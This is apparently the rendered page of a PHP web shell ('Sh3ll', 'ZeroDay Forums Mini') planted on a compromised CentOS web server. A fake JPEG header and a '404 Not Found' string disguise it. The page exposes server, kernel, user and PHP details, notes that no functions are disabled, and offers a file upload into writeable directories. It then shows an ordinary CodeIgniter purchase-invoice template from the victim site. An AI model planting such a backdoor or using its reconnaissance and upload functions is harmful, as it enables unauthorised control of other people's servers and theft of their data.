����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/views/purchase/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/application/modules/dashboard/views/purchase/pdf_purchase.php
<?php defined('BASEPATH') OR exit('No direct script access allowed');?>
<!-- Pdf view supplier  -->
<table class="table table-striped table-condensed table-bordered">
	<thead>
		<tr>
			<th colspan="2">Date :&nbsp;{final_date}</th>
			<th colspan="2">Name : &nbsp;<span class="fw_normal">{supplier_name}</span></th>
			<th>Invoice-No :&nbsp; {chalan_no}</th>
		</tr>
		<tr>
			<th colspan="5">&nbsp;</th>
		</tr>
		<tr>
			<th>#</th>
			<th>Product Name</th>
			<th>Total Quantity</th>
			<th>Rate</th>
			<th>Total Amount</th>
		</tr>
	</thead>
	<tbody>
	{purchase_all_data}
		<tr>
			<td>{sl}</td>
			<td>{product_name}</td>
			<td>{quantity}</td>
			<td>{rate}</td>
			<td>{total_amount}</td>
		</tr>
	{/purchase_all_data}
	</tbody>
	<tfoot>
		<tr>
			<td class="text-right" colspan="4"><b>Grand total:</b></td>
			<td class="text-right">{sub_total_amount}</td>
		</tr>
	</tfoot>
</table>
<!-- Pdf view supplier  -->

ZeroDay Forums Mini